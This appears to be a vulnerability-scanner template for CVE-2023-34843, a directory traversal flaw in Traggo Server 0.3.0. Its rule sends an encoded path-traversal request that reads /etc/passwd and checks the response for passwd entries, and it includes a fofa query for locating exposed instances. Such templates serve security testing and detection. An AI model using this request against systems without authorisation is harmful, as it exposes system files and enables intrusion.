id: CVE-2023-34843

info:
  name: Traggo directory traversal
  author: laohuan12138
  severity: high
  verified: true
  description: |
    CVE-2023-34843 Traggo Server 0.3.0 is vulnerable to directory traversal via a crafted GET reques
    fofa: "traggo"
  reference:
    - https://twitter.com/CVEnew/status/1674221239550836736
    - https://github.com/rootd4ddy/CVE-2023-34843

  tags: cve,cve2023,lfi
  created: 2023/07/01

rules:
  r0:
    request:
      method: GET
      path: /static/..%5c..%5c..%5c..%5cetc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)

expression: r0()


